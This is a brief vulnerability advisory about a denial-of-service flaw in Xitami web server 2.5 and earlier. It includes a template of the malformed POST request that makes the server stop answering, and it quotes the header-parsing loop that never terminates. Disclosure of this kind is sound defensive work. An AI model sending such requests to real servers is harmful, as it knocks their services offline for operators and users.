|
|
| |
| Xitami web server has been found to contain a vulnerability that allows remote attackers to cause a denial of service against the product by sending the server a malformed header. |
| |
Credit:
The information has been provided by Tri Huynh.
|
| |
Vulnerable systems:
* Xitami version 2.5 and prior
Xitami has a logical error in the way it handles POST requests. A request like this will make the server not respond to any other requests although the server still listens to port 80:
POST /forum/index.php HTTP/1.1
Referer: Sentryunion
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Content-Length: 10
(Long string here)
0x0D 0x0A
(Another long string here)
Vulnerable code:
The code that handles parsing of the HTTP header doesn't have a good logic:
while(header && *header && *header != '\r')
{
header_name = header
if((header_value=strchr(header_name, ":")) != NULL)
{ ... header++;}
}
So if inside the HTTP request the header does not contain a ":" character, the while loop will run until the process is manually terminated.
|
|
|
|
|
|
|
|
